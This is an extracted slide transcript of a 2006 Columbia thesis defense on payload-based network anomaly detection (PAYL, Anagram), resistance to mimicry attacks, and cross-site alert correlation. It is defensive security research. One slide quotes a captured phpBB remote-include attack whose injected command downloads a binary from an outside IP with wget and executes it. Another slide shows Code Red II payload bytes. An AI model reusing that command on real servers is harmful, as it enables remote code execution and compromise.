1 Network Payload-based Anomaly Detection and Content-based Alert Correlation Ke Wang Ke Wang Thesis Defense Thesis Defense Aug. 14 Aug. 14 th th , 2006 , 2006 Department of Computer Department of Computer Science Science Columbia University Columbia University
92
Embed
1 Network Payload-based Anomaly Detection and Content-based Alert Correlation Ke Wang Thesis Defense Aug. 14 th, 2006 Department of Computer Science Columbia.
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
1
Network Payload-based Anomaly Detection and
Content-based Alert Correlation
Ke WangKe WangThesis DefenseThesis DefenseAug. 14Aug. 14thth, 2006, 2006
Department of Computer ScienceDepartment of Computer ScienceColumbia UniversityColumbia University
2
Why do we need Why do we need payload-based anomaly payload-based anomaly
detectiondetection Attacks that are normal connections Attacks that are normal connections
may carry bad (anomalous) content may carry bad (anomalous) content indicative of a new exploitindicative of a new exploit
Slow and stealthy, or targeted/hitlist Slow and stealthy, or targeted/hitlist worms do not display “loud and worms do not display “loud and obvious” scanning or propagation obvious” scanning or propagation behavior detectable via flow statistics behavior detectable via flow statistics
This sensor augments other sensors This sensor augments other sensors and enriches the view of the networkand enriches the view of the network
3
Conjecture and GoalConjecture and Goal Detect Zero-Day Exploits via Content AnalysisDetect Zero-Day Exploits via Content Analysis
Targeted Attacks (sophisticated, stealthy, no “loud and Targeted Attacks (sophisticated, stealthy, no “loud and obvious” propagation) obvious” propagation)
True Zero-day will manifest as “never before True Zero-day will manifest as “never before seen data” delivered to an application or serverseen data” delivered to an application or server
Generate signature immediately to stop further Generate signature immediately to stop further propagationpropagation No need to wait until “payload prevalence” (a sufficient No need to wait until “payload prevalence” (a sufficient
number of repeated occurrences of the same content)number of repeated occurrences of the same content) Develop sensors that are accurate, efficient, Develop sensors that are accurate, efficient,
scalable, with resiliency to mimicry attacksscalable, with resiliency to mimicry attacks
4
ContributionsContributions Demonstrate the usefulness of analyzing
network payload for anomaly detection PAYL: 1-gram modelingPAYL: 1-gram modeling Anagram: higher order n-gram modelingAnagram: higher order n-gram modeling
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm’s initial propagation attempt
Efficient privacy-preserving payload correlation across sites, and automatic signature generation
5
ContributionsContributions Demonstrate the usefulness of analyzing network
payload for anomaly detection PAYL: 1-gram modelingPAYL: 1-gram modeling
Incremental learningIncremental learning Clustering for space savingClustering for space saving Multi-centroids fine grained modelingMulti-centroids fine grained modeling
Anagram: higher order n-gram modelingAnagram: higher order n-gram modeling Randomized modeling/testing that can help thwart mimicry
attacks Ingress/egress payload correlation to capture a worm’s initial
propagation attempt Efficient privacy-preserving payload correlation across sites
6
Motivation of PAYLMotivation of PAYL Content traffic to different ports have very Content traffic to different ports have very
different payload distributionsdifferent payload distributions Within one port, packets with different Within one port, packets with different
lengths also have different payload lengths also have different payload distributionsdistributions
Furthermore, worm/virus payloads usually Furthermore, worm/virus payloads usually are quite different from normal distributionsare quite different from normal distributions
Previous work: Previous work: Attack signature: Snort, BroAttack signature: Snort, Bro First few bytes of a packet: NATE, PHAD, ALADFirst few bytes of a packet: NATE, PHAD, ALAD Service-specific IDS [CKrugel02]: coarse Service-specific IDS [CKrugel02]: coarse
modeling, 256 ASCII characters in 6 groups.modeling, 256 ASCII characters in 6 groups.
7
Dest Port 22 Dest Port 25 Dest Port 80
Src Port 22 Src Port 25 Src Port 80
Example byte distributions Example byte distributions for different portsfor different ports
ssh Mail Web
8
Example byte distribution for Example byte distribution for different payload lengths of port 80 different payload lengths of port 80
on the same host serveron the same host server
9
CR II distribution versus a CR II distribution versus a normal distributionnormal distribution
10
How to model “normal” How to model “normal” content: content:
1-gram Centroid1-gram CentroidThe average relative frequency of each byte, The average relative frequency of each byte, and the standard deviation of the frequency and the standard deviation of the frequency of each byte, for payload length 185 of port of each byte, for payload length 185 of port 80 80
Models are computed from packet stream Models are computed from packet stream incrementally incrementally conditioned on port/service and length of conditioned on port/service and length of packetpacket
Hands-free epoch-based trainingHands-free epoch-based training Fine-grained multi-centroids modelingFine-grained multi-centroids modeling
ClusteringClustering: merge two neighbouring centroids if their : merge two neighbouring centroids if their Manhattan distance is smaller than thresholdManhattan distance is smaller than threshold Save space, remove redundancy, linear time Save space, remove redundancy, linear time
computationcomputation Improve the modeling accuracy for those length bins Improve the modeling accuracy for those length bins
with few training data (sparseness)with few training data (sparseness) Self-calibration phaseSelf-calibration phase
Sampled training data sets an initial threshold settingSampled training data sets an initial threshold setting Detection phase Detection phase
Packets are compared against models using simplified Packets are compared against models using simplified Mahalanobis distanceMahalanobis distance
12
Performance comparison: Performance comparison: single centroid vs. multi-single centroid vs. multi-
Con:Con: Cannot capture attacks displaying normal byte Cannot capture attacks displaying normal byte
distributiondistribution Easily fooled by mimicry attacks with proper Easily fooled by mimicry attacks with proper
paddingpadding
14
Example: phpBB forum Example: phpBB forum attackattack
Relatively normal byte distribution, so PAYL Relatively normal byte distribution, so PAYL misses itmisses it
Abnormal sequence of commands for exploitationAbnormal sequence of commands for exploitation The attack invariantsThe attack invariants The subsequence of new, distinct bye values should be The subsequence of new, distinct bye values should be
“malicious”“malicious” What we need: capture order dependence of byte What we need: capture order dependence of byte
sequences --- sequences --- higher order n-grams modelinghigher order n-grams modeling
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User‑Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..
15
ContributionsContributions Demonstrate the usefulness of analyzing network payload for
Anagram: higher order n-gram modelingAnagram: higher order n-gram modeling Binary-based modelingBinary-based modeling Bloom filter for space efficiencyBloom filter for space efficiency Semi-supervised learningSemi-supervised learning Privacy-preserving payload alert for Privacy-preserving payload alert for
correlationcorrelation Randomized modeling/testing that can help thwart mimicry
attacks Ingress/egress payload correlation to capture a worm’s initial
propagation attempt Efficient privacy-preserving payload correlation across sites
16
Overview of AnagramOverview of Anagram Binary-base higher order n-grams modelingBinary-base higher order n-grams modeling
Models all the distinct n-grams appearing in the Models all the distinct n-grams appearing in the normal training data normal training data
During test, compute the percentage of never-During test, compute the percentage of never-seen distinct n-grams out of the total n-grams in seen distinct n-grams out of the total n-grams in a packet:a packet:
Semi-supervised learningSemi-supervised learning
Normal traffic is modeledNormal traffic is modeled Prior known malicious traffic is modeled: Prior known malicious traffic is modeled:
Snort Rules, captured malcodeSnort Rules, captured malcode Model is space-efficient by using Bloom Model is space-efficient by using Bloom
filtersfilters Previous workPrevious work
Foreign system call sequences [Forrest96]Foreign system call sequences [Forrest96] Trie-based n-gram storage and comparison for Trie-based n-gram storage and comparison for
False positive rate (with 100% detection rate) with different training time and n of n-grams
Low False positive rate Low False positive rate per packetper packet (better per (better per flow)flow)
No significant gain after No significant gain after 4 days’ training4 days’ training
Higher order n-grams Higher order n-grams needs longer training needs longer training time to build good time to build good modelmodel
3-grams are not long 3-grams are not long enough to distinguish enough to distinguish malicious byte malicious byte sequences from normal sequences from normal onesones
Normal traffic: real web traffic collected of two CUCS web servers
Test worms: CR, CRII, WebDAV, Mirela, phpBB forum attack, nsiislog.dll buffer overflow(MS03-022)
The false positive rate (with 100% detection rate) for different n-grams, under both normal and semi-supervised training – per packet rate
21
Mimicry attacksMimicry attacks Attackers can mimic the normal traffic and hide the Attackers can mimic the normal traffic and hide the
exploit inside “the sled” to avoid the sensor easily.exploit inside “the sled” to avoid the sensor easily. Example: polymorphic mimicry worm developed by [OK05] Example: polymorphic mimicry worm developed by [OK05]
targeting PAYL, which do encoding and traffic blending to targeting PAYL, which do encoding and traffic blending to simulate normal profile.simulate normal profile.
22
ContributionsContributions Demonstrate the usefulness of analyzing network
payload for anomaly detection
Randomized modeling/testing that can help thwart mimicry attacks
Ingress/egress payload correlation to capture a worm’s initial propagation attempt
Efficient privacy-preserving payload correlation across sites
23
Randomization against Randomization against mimicry attacksmimicry attacks
The general idea of payload-based mimicry attacks The general idea of payload-based mimicry attacks is by crafting small pieces of exploit code with a is by crafting small pieces of exploit code with a large amount of “normal” padding to make the large amount of “normal” padding to make the whole packet look normal.whole packet look normal.
If we If we randomly choose the payload portionrandomly choose the payload portion for for modeling/testingmodeling/testing, the attacker would not know , the attacker would not know precisely which byte positions it may have to pad precisely which byte positions it may have to pad to appear normal; harder to hide the exploit code!to appear normal; harder to hide the exploit code!
This is a This is a generalgeneral technique can be used for both technique can be used for both PAYL and Anagram, or any other payload anomaly PAYL and Anagram, or any other payload anomaly detector.detector.
For Anagram, additional randomization, keep n-For Anagram, additional randomization, keep n-gram size a secret!gram size a secret!
24
Randomized ModelingRandomized Modeling Separate the whole packet randomly into Separate the whole packet randomly into
several (possibly interleaved) substrings or several (possibly interleaved) substrings or subsequences: subsequences: SS11, S, S22, ..S, ..SNN, and build one , and build one model for each of them model for each of them
Test packet’s payload is divided accordinglyTest packet’s payload is divided accordingly
25
Models from sub-partitions may be similarModels from sub-partitions may be similar Higher memory consumption, no real model Higher memory consumption, no real model
diversitydiversity The testing partitioning need to be the same The testing partitioning need to be the same
as training partitioningas training partitioning Less flexibilityLess flexibility Need to retrain when wants to change partitionsNeed to retrain when wants to change partitions
Top plot is the model built from the whole packet, and the bottom two are the models built from two random sub-partitions.
Shortcomings:
26
Randomized TestingRandomized Testing Simpler strategy that does not incur Simpler strategy that does not incur
substantial overheadsubstantial overhead Build one model for whole packet, Build one model for whole packet,
randomize tested portionsrandomize tested portions Separate the whole packet randomly into Separate the whole packet randomly into
several (possibly interleaved) partitions: several (possibly interleaved) partitions: SS11, , SS22, ..S, ..SNN, ,
Score each randomly chosen partition Score each randomly chosen partition separatelyseparately
Use the maximum score:Use the maximum score:
ii TNScorenew
/max
27
28
DetectiDetection on
TimesTimes
Avg. FPAvg. FP Std. FPStd. FP
Pure Pure random random maskmask
16/2016/20 0.269%0.269% 0.375%0.375%
Chunked Chunked random random maskmask
14/2014/20 0.175%0.175% 0.409%0.409%
PAYL Test: on the mimicry attack designed by
[OK05] targeting it, 20 fold fold
randomized testingrandomized testing
29
Anagram TestAnagram Test: : average false positive rate and standard average false positive rate and standard
deviation withdeviation with 100% detection rate, 100% detection rate, chunked random mask, 10 fold randomized chunked random mask, 10 fold randomized
testingtesting
Normal training Semi-supervised training
30
ContributionsContributions Demonstrate the usefulness of analyzing network
payload for anomaly detection Randomized modeling/testing that can help thwart
mimicry attacks
Ingress/egress payload correlation to capture a worm’s initial propagation attempt Detect slow or stealthy wormsDetect slow or stealthy worms Immediate signature generation
Efficient privacy-preserving payload correlation across sites.
31
Ingress/egress correlation to Ingress/egress correlation to detectdetect
Self-propagating worms will start attacking other Self-propagating worms will start attacking other machines (by sending at least the exploit portion of its machines (by sending at least the exploit portion of its content) shortly after a host is infected content) shortly after a host is infected
The attacked destination port will be the same since The attacked destination port will be the same since it’s exploiting the same vulnerabilityit’s exploiting the same vulnerability
An approach to stop the worm’s very first An approach to stop the worm’s very first propagation attemptpropagation attempt If we detect anomalous egress packets to port If we detect anomalous egress packets to port ii very very
similar to those anomalous ingress packets to port similar to those anomalous ingress packets to port ii, , there is a high probability that a worm has started its there is a high probability that a worm has started its propagationpropagation
Advantage:Advantage: Can detect Can detect slow or stealthyslow or stealthy worms which won’t show worms which won’t show
probe behavior and thus avoid probe detectorsprobe behavior and thus avoid probe detectors
32
Similarity metrics to compare Similarity metrics to compare the payloads of two or more the payloads of two or more
anomalous packet alertsanomalous packet alerts
2*C/( L1+ L2)
2*C/( L1+ L2)
1 for equal,
0 otherwise
Similarity score [0, 1]
SomeYesRaw dataLongest common subsequence (LCSeq)
NoYesRaw dataLongest common substring (LCS)
NoNoRaw dataString equality (SE)
Detect metamorphic
Handle fragment
Data usedMetric
Experiment result
33
|d0|$@|0 ff|5|d0|$@|0|h|d0| @|0|j|1|j|0|U|ff|5|d8|$@|0 e8 19 0 0 0 c3 ff|%`0@|0 ff|%d0@|0 ff|%h0@|0 ff|%p0@|0 ff|%t0@|0 ff|%x0@|0 ff|%|0@|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 0 0 0 0 0 0 0 0 0 0 0 0 0|\EXPLORER.EXE|0 0 0|SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|0 0 0|SFCDisable|0 0 9d ff ff ff|SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots|0 0 0 0|/Scripts|0 0 0 0|/MSADC|0 0|/C|0 0|/D|0 0|c:\,,217|0 0 0 0|d:\,,217|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc…
LCS signature LCS signature generation: generation: Code Red IICode Red II
substrings or tokens from suspicious IP, substrings or tokens from suspicious IP, which still depends on the scanning which still depends on the scanning behaviorbehavior
Detection occurs some time after the Detection occurs some time after the worm propagationworm propagation
Cannot detect slow and stealthy wormsCannot detect slow and stealthy worms
35
ContributionsContributions Demonstrate the usefulness of analyzing network
payload for anomaly detection Randomized modeling/testing that can help thwart
mimicry attacks Ingress/egress payload correlation to capture a
Each site has a distinct content flow Each site has a distinct content flow Diversity via content (not system or software)Diversity via content (not system or software)
Find global, common “invariants in content”.Find global, common “invariants in content”. If multiple sites see the same/similar content alerts, If multiple sites see the same/similar content alerts,
it’s highly likely to be a true worm/targeted it’s highly likely to be a true worm/targeted outbreakoutbreak
Separate TP’s from FP’s! Separate TP’s from FP’s! The False False PositiveThe False False Positive ProblemProblem
Reduces false positives by creating white lists Reduces false positives by creating white lists of those alerts that cannot be correlatedof those alerts that cannot be correlated
Higher standard to prevent mimicry attackHigher standard to prevent mimicry attack Exploit writers/attackers have to learn the distinct Exploit writers/attackers have to learn the distinct
content traffic patterns of many different sites content traffic patterns of many different sites Need to be privacy-preservingNeed to be privacy-preserving
37
Related ResearchRelated Research
DNAD/Worminator (slow/IP) sharingDNAD/Worminator (slow/IP) sharing Domino alert sharingDomino alert sharing The DShield.org model for content The DShield.org model for content
sharing and queryingsharing and querying Could also serve as a “trap” to detect Could also serve as a “trap” to detect
Frequency distribution; the most frequent character is a space (ASCII code 32). Size ≈ 8160
bits.
List of 3-grams in original string. A box represents a space; the
underlined n-gram appears twice in the original alert. 25 n-grams take
approximately 600 bits.0000011010101101001101100110101101010…01010011101010101111000Bloom filter of above n-grams. If three hash values are used, a minimum optimal size would be ~ 150 bits.
□□isamnotTbcdghrisamnotTbcdghrZ-String; the space (box) is the most frequent character. Non-
appearing characters are removed.
15 characters = 120 bits.
40
Real traffic evaluationReal traffic evaluation Goal: measure performance in identifying true Goal: measure performance in identifying true
alerts from false positivesalerts from false positives Ideal: true positives have very high similarity Ideal: true positives have very high similarity
scores, while false positives have very low scoresscores, while false positives have very low scores Mix the collection of attacks into two hours of Mix the collection of attacks into two hours of
traffic from traffic from wwwwww and and www1www1 Multiple, differently-fragmented instances of Code Multiple, differently-fragmented instances of Code
Red and Code Red II to simulate a real worm attackRed and Code Red II to simulate a real worm attack Mixed sets are run through PAYL and Mixed sets are run through PAYL and
Anagram, with alerting threshold reduced so Anagram, with alerting threshold reduced so that 100% of attacks are detected, but with that 100% of attacks are detected, but with possibly higher FP ratespossibly higher FP rates
String evaluation
41
Real traffic evaluation Real traffic evaluation (II)(II)
False positive score range; blue bar represents 99.9% percentile; white represents maximum score
Range of scores across multiple instances of the same worm (CR or CRII)Range of scores across instances of different worms (CR vs. CRII), e.g., polymorphism
Methods are, from 1 to 8: Raw-LCS, Raw-LCSeq, Raw-ED, Freq-MD, ZStr-LCS, ZStr-LCSeq, Zstr-ED, N-grams with n=5.
42
Real traffic evaluation Real traffic evaluation (III)(III)
Correlation of identical (non-polymorphic) Correlation of identical (non-polymorphic) attacks works accurately for all techniquesattacks works accurately for all techniques Non-fragmented attacks score near 1Non-fragmented attacks score near 1 Z-Strings (MD, LCseq, ED) and n-grams handle Z-Strings (MD, LCseq, ED) and n-grams handle
fragmentation wellfragmentation well Polymorphism is hard to detect; only Raw-Polymorphism is hard to detect; only Raw-
LCSeq and n-grams score wellLCSeq and n-grams score well Overall, n-grams are particularly effective Overall, n-grams are particularly effective
at eliminating false positives, and Bloom at eliminating false positives, and Bloom filters enable privacy preservationfilters enable privacy preservation
43
Signature GenerationSignature Generation Each class of techniques can generate its Each class of techniques can generate its
own signatureown signature Raw packets: Exchange LCS/LCSeqRaw packets: Exchange LCS/LCSeq
Not privacy-preservingNot privacy-preserving Byte frequency/Z-StringsByte frequency/Z-Strings
Given the frequency distribution, Z-Strings Given the frequency distribution, Z-Strings generated by ordering from most to least generated by ordering from most to least frequent and dropping the least frequentfrequent and dropping the least frequent
N-gramsN-grams Robust to reordering or fragmentationRobust to reordering or fragmentation If position information is available, can “flatten” If position information is available, can “flatten”
into a deployable string signatureinto a deployable string signature
44
Signature/Query Signature/Query generation (II)generation (II)
Accuracy of the signaturesAccuracy of the signaturesThe accumulative frequency of the signature match scores computed by matching normal traffic against different worm signatures. The closer to the y-axis, the more accurate.
The six curves represent the following, in order from the left to the right: 1) n-grams signature, 2) Z-string signature comparing using LCS, 3) LCSeq of raw signature, 4) Z-string signature using LCSeq, 5) LCSeq of raw signature, 6) byte-frequency signature.
46
Signature for Signature for polymorphic wormpolymorphic worm
Our approaches work poor since they are Our approaches work poor since they are based on payload similaritybased on payload similarity
Will there be enough invariants for accurate Will there be enough invariants for accurate signature?signature? Slammer: first byte “0x04”Slammer: first byte “0x04” CLET shellcode 2: CLET shellcode 2: “\0xff\0xff\0xff” and “\0xeb\0x31”.
Proposed alternative: “generalized signature” specifying the higher-level pattern of an attack, instead of raw payload based. “0xeb 0x31”B {92 bytes, entropy: E, “0xff 0xff
0xff”B}
47
ConclusionsConclusions
Network payload-based PAYL and Anagram Network payload-based PAYL and Anagram can detect zero-day attacks with high can detect zero-day attacks with high accuracy and low false positivesaccuracy and low false positives
Randomization help thwart mimicry attackRandomization help thwart mimicry attack Ingress/egress correlation detects worm’s Ingress/egress correlation detects worm’s
initial propagation and generate accurate initial propagation and generate accurate worm signatureworm signature Good at detecting slow/stealth wormsGood at detecting slow/stealth worms
Privacy-preserving payload alerts Privacy-preserving payload alerts correlation across sites can identify true correlation across sites can identify true anomalies and reduces false positiveanomalies and reduces false positive Accurate signature generationAccurate signature generation
48
Accomplishments Accomplishments Major papers:Major papers:
Anagram: A Content Anomaly Detector Resistant to Anagram: A Content Anomaly Detector Resistant to Mimicry Attack,Mimicry Attack, K. Wang, J. Parekh, S. Stolfo, RAID, K. Wang, J. Parekh, S. Stolfo, RAID, Sept 2006. Sept 2006.
Privacy-preserving Payload-based Correlation for Privacy-preserving Payload-based Correlation for Accurate Malicious Traffic DetectionAccurate Malicious Traffic Detection, J. Parekh, K. , J. Parekh, K. Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept, Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept, 2006.2006.
Anomalous Payload-based Worm Detection and Anomalous Payload-based Worm Detection and Signature GenerationSignature Generation, K. Wang, G. Cretu, S. Stolfo, , K. Wang, G. Cretu, S. Stolfo, RAID, Sept 2005.RAID, Sept 2005.
FLIPS: Hybrid Adaptive Intrusion Prevention, FLIPS: Hybrid Adaptive Intrusion Prevention, M. M. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept. 2005.2005.
Anomalous Payload-based Network Intrusion Anomalous Payload-based Network Intrusion DetectionDetection, K. Wang, S. Stolfo, RAID, Sept 2004., K. Wang, S. Stolfo, RAID, Sept 2004.
Software implementation (licensed by Columbia):Software implementation (licensed by Columbia): PAYL sensorPAYL sensor Anagram sensorAnagram sensor
49
Future WorkFuture Work Further Evaluation – including
measures/features of high-entropy partitions Optimization problem: model parameter
settings (n-gram size, thresholds, etc.), random mask generation
Real deployment of multiple-site correlation
Shadow server architecture implementation and testing
Pushing into the host: integration with instrumented application software
50
Thank you!Thank you!
Q/A ? Q/A ?
51
Backup slidesBackup slides
52
Overview of PAYL – How Overview of PAYL – How it worksit works
Principles of operationPrinciples of operation Normal packet content is automatically learnedNormal packet content is automatically learned Based upon unsupervised anomaly detection Based upon unsupervised anomaly detection
algorithmsalgorithms Fine-grained modeling of normal payload Fine-grained modeling of normal payload
Site and application specific, also conditioned on Site and application specific, also conditioned on packet lengthpacket length
Build byte frequency distribution and its standard Build byte frequency distribution and its standard deviation as normal profiledeviation as normal profile
For test data, compute the simplified For test data, compute the simplified Mahalanobis distance against its centroid to Mahalanobis distance against its centroid to measure similaritymeasure similarity
Each site/host has a “unique” content flow that Each site/host has a “unique” content flow that may be automatically learnedmay be automatically learned
UAD Generates model over “unlabeled” dataUAD Generates model over “unlabeled” data Model detectsModel detects
Anomalies in collected training data (Forensics)Anomalies in collected training data (Forensics) Anomalies in data stream (Detection)Anomalies in data stream (Detection)
Computational Approach: Outlier DetectionComputational Approach: Outlier Detection Two frameworks: geometric, Two frameworks: geometric,
probabilistic/statisticalprobabilistic/statistical Several algorithms – PAYL is based upon Several algorithms – PAYL is based upon
comparison of content statistical distributionscomparison of content statistical distributions Handles “noise” in dataHandles “noise” in data
No guarantees of “attack-free” dataNo guarantees of “attack-free” data Assumes most data is “attack-free”Assumes most data is “attack-free”
Return to main Return to main slidesslides
54
Epoch-based learningEpoch-based learning
To determine how much training data is enough, or whether the model is ready for use
An epoch is measured in terms of the number of packets analyzed, or by means of a time period
The training phase is sufficiently complete if the model current computed has changed little for several continuous epochs
Need to define model similarity measurements
55
Epoch-based learning: PAYLEpoch-based learning: PAYL Metric 1: number of new centroids produced in the
current epoch, Metric 2: Manhattan distance of each centroid to each
nearest one computed in the prior epoch
Return to main Return to main slidesslides
56
0 50 100 150 200 250 300 350 400 4500
0.001
0.002
0.003
0.004
0.005
0.006
0.007
0.008
0.009
0.01
Per 10000 content packets
Like
lihoo
d of
see
ing
new
n-g
ram
s 3-grams5-grams7-grams
The likelihood of seeing new n-grams, which is the percentage of the new distinct n-grams out of total n-grams in this epoch
The computed Mahalanobis The computed Mahalanobis distance of the normal and distance of the normal and
attack packetsattack packets
The normal data’s distances are displayed as The normal data’s distances are displayed as several bandsseveral bands, which illustrates that we might , which illustrates that we might have have multiple centroidsmultiple centroids for one length for one length
58
Multiple centroids Multiple centroids modeling for each lengthmodeling for each length
Goal: build finer-grained models for the Goal: build finer-grained models for the payload to detect anomalies more accuratelypayload to detect anomalies more accurately
Problems:Problems: Don’t know how many clusters may existDon’t know how many clusters may exist Can only access each packet data once in sequence, Can only access each packet data once in sequence,
cannot store them in memorycannot store them in memory So the traditional clustering algorithm like K-means, So the traditional clustering algorithm like K-means,
EM cannot be easily applied hereEM cannot be easily applied here Our solutionOur solution
Standard metric to compare two Standard metric to compare two statistical distributions:statistical distributions:
x is the test data, and y is its profile. x is the test data, and y is its profile. When we assume each ASCII value When we assume each ASCII value
is independent, the formula can be is independent, the formula can be simplified:simplified:
)()(),( 12 yxCyxyxd T
),( jiij yyCovC
)/|(|),(1
0 i
n
i ii yxyxd
Return to main Return to main slidesslides
60
Incremental Learning Incremental Learning
Average of N Average of N data:data:
When the (N+1)When the (N+1)thth data arrives:data arrives:
For the standard deviation, we can rewrite it as the For the standard deviation, we can rewrite it as the following:following:
Therefore, we don’t need to keep previous data to Therefore, we don’t need to keep previous data to update the new average and standard deviationupdate the new average and standard deviation
Now each centroid stores only the average of Now each centroid stores only the average of xx and and xx22
Return to main slidesReturn to main slides
NxxN
i i
1
1111
N
xxx
N
xNxx NN
222 )()()()( EXXEEXXEXVar
61
Manhattan distanceManhattan distance
n
iii yxyxMdis
0
||),(
x y
23||),(6
1
i
ii yxyxMdis
62
Example of clustering Example of clustering across length binsacross length bins
Original centroidsOriginal centroids
Clustered centroidsClustered centroids
Return to main slides
63
Self-calibrationSelf-calibration Training data is sampledTraining data is sampled Use FIFO to keep the most recent samples Use FIFO to keep the most recent samples
to capture concept driftto capture concept drift After training, compute the distances of After training, compute the distances of
samples against the centroid and set the samples against the centroid and set the anomalous threshold to the maximum anomalous threshold to the maximum
At the start of the detection phase, At the start of the detection phase, increase the threshold by t% if the alert increase the threshold by t% if the alert rate is higher than a user-specified rate is higher than a user-specified parameterparameterReturn to main slides
clustering for stream clustering for stream processingprocessing
Main idea: Main idea: Store byte distributions of M packets Store byte distributions of M packets Optimize aggregate clustering of the M Optimize aggregate clustering of the M
packetspackets Merge the resulting centroids into the existing Merge the resulting centroids into the existing
centroids from prior batch of datacentroids from prior batch of data Can ameliorate the problem of packet orderingCan ameliorate the problem of packet ordering The batch size M needs to be chosen properly: The batch size M needs to be chosen properly:
tradeoff of accuracy and memory consumptiontradeoff of accuracy and memory consumption
67
One-pass clustering result. First six centroids for W dataset, length 1460
68
Semi-batch clustering result. First six centroids for W dataset, length 1460
Return to main slides
69
PerformancePerformance Training over 3 days of data, detection Training over 3 days of data, detection
over 2 daysover 2 days Data from two web serversData from two web servers Training: 29 seconds (60 MBits/sec)Training: 29 seconds (60 MBits/sec) Detection: 12 seconds (54 MBits/sec)Detection: 12 seconds (54 MBits/sec) FP Rate: 42 / 625595 packets (0.006%)FP Rate: 42 / 625595 packets (0.006%) Coverage: 20/30 known attacks in data Coverage: 20/30 known attacks in data
detecteddetected
70
Bloom filterBloom filter A A Bloom filterBloom filter (BF) is a one-way data structure (BF) is a one-way data structure
that supports that supports insertinsert and and verifyverify operations, yet is operations, yet is fast and space-efficientfast and space-efficient
Represented as a bit vector; bit Represented as a bit vector; bit bb is set if is set if hhii((ee) = ) = bb, where , where hhii is a hash function and is a hash function and ee is the is the element in questionelement in question
No false negatives, although false positives are No false negatives, although false positives are possible in a saturated BF via hash collisions; possible in a saturated BF via hash collisions; use multiple hash functions for robustnessuse multiple hash functions for robustness
Each n-gram is a candidate element to be Each n-gram is a candidate element to be inserted or verified in the BFinserted or verified in the BF
Bloom filters are also Bloom filters are also privacy-preservingprivacy-preserving, since , since n-grams cannot be extracted from the resulting n-grams cannot be extracted from the resulting bit vectorbit vector
Binary-based approach is simple and efficient, Binary-based approach is simple and efficient, but too sensitive to noisy databut too sensitive to noisy data
Pre-compute a Pre-compute a bad content modelbad content model using snort using snort rules and collection of worm samples, to rules and collection of worm samples, to supervise the learningsupervise the learning This model should match very few normal packets, This model should match very few normal packets,
while able to identify malicious traffic (often, new while able to identify malicious traffic (often, new exploits reuse portions of old exploits)exploits reuse portions of old exploits)
The model contains the distinct n-grams The model contains the distinct n-grams appearing in these malcode collectionsappearing in these malcode collections
Use a small, clean dataset to exclude the Use a small, clean dataset to exclude the normal n-grams appearing in the snort rules normal n-grams appearing in the snort rules and virus.and virus.
73
Bad content model (purple part)
N-grams in snort rules and collected malwares
N-grams in clean traffic
74
0 20 40 60 80 1000
0.1
0.2
0.3
0.4
0.5
0.6
0.7
0.8
0.9
1
Bad Content Model Matching Score
Per
cent
age
of t
he p
acke
ts
Normal Content Packets
0 20 40 60 80 1000
0.05
0.1
0.15
0.2
0.25
Bad Content Model Matching Score
Per
cent
age
of t
he p
acke
ts
Attack Packets
Distribution of bad content matching scores for normal packets (left) and attack packets (right).
The “matching score” is the percentage of the n-grams of a packet that match the bad content model
75
Use of bad content modelUse of bad content model
Training: ignore possible malicious n-gramsTraining: ignore possible malicious n-grams Packets with a max number of N-grams matching Packets with a max number of N-grams matching
the bad content model are ignoredthe bad content model are ignored Packets with high matching score (>5%) Packets with high matching score (>5%)
ignored, since new attacks might reuse old ignored, since new attacks might reuse old exploit code.exploit code.
Ignoring few packets is harmless for trainingIgnoring few packets is harmless for training Testing: scoring separates malicious from Testing: scoring separates malicious from
normalnormal If a never-seen n-gram also appears in the bad If a never-seen n-gram also appears in the bad
content model, give a higher weight factor content model, give a higher weight factor tt for for it. (t=5 in our experiment)it. (t=5 in our experiment)
T
NtNScore badnewnew _*
Back
76
Feedback-based learning Feedback-based learning with shadow serverswith shadow servers
Training attacks: attacker sends malicious data Training attacks: attacker sends malicious data during training time to poison the model.during training time to poison the model. Bad content model cannot guarantee 100% detectionBad content model cannot guarantee 100% detection
The most reliable way is using the feedback of The most reliable way is using the feedback of some host-based shadow server to supervise the some host-based shadow server to supervise the trainingtraining
Also useful for adaptive learning to accommodate Also useful for adaptive learning to accommodate concept shiftingconcept shifting
PAYL/Anagram can be used as a first-line classifier PAYL/Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow serverto amortize the expensive cost of the shadow server Only small percentage of the all traffic is sent to shadow Only small percentage of the all traffic is sent to shadow
server, instead of allserver, instead of all The feedback of shadow server can be improve the The feedback of shadow server can be improve the
accuracy of Anagramaccuracy of Anagram
77Back
78
The structure of the The structure of the mimicry wormmimicry worm
79
The maximum possible padding The maximum possible padding length for a packet of different length for a packet of different varieties of this mimicry attackvarieties of this mimicry attack
versioversionn
418, 418, 1010
418, 418, 100100
730, 730, 1010
730, 730, 1010
730, 730, 100100
730, 730, 100100
PaddiPadding ng lengthlength
125125 149149 437437 461461 11671167 11911191
Each cell in the top row contains a tuple (x, y), representing a variant sequence of y packets of x bytes each.
The second row represents the maximum number of bytes that can be used for padding in each packet.Return to main
Launched CodeRed and CodeRed II in our Launched CodeRed and CodeRed II in our controlled test environment, capture the controlled test environment, capture the traces, and merge the traces into a real web traces, and merge the traces into a real web server's trace server's trace Simulate a real worm attacking and propagating Simulate a real worm attacking and propagating
on a real serveron a real server Interesting behavior observed about the Interesting behavior observed about the
wormworm Propagation occurred with packets fragmented Propagation occurred with packets fragmented
differently than the initial attack packets differently than the initial attack packets Multiple types of fragmentationMultiple types of fragmentation
81
1460, 1460, 8981448, 1448, 922
OutgoingIncoming
Code Red II (total 3818 bytes)
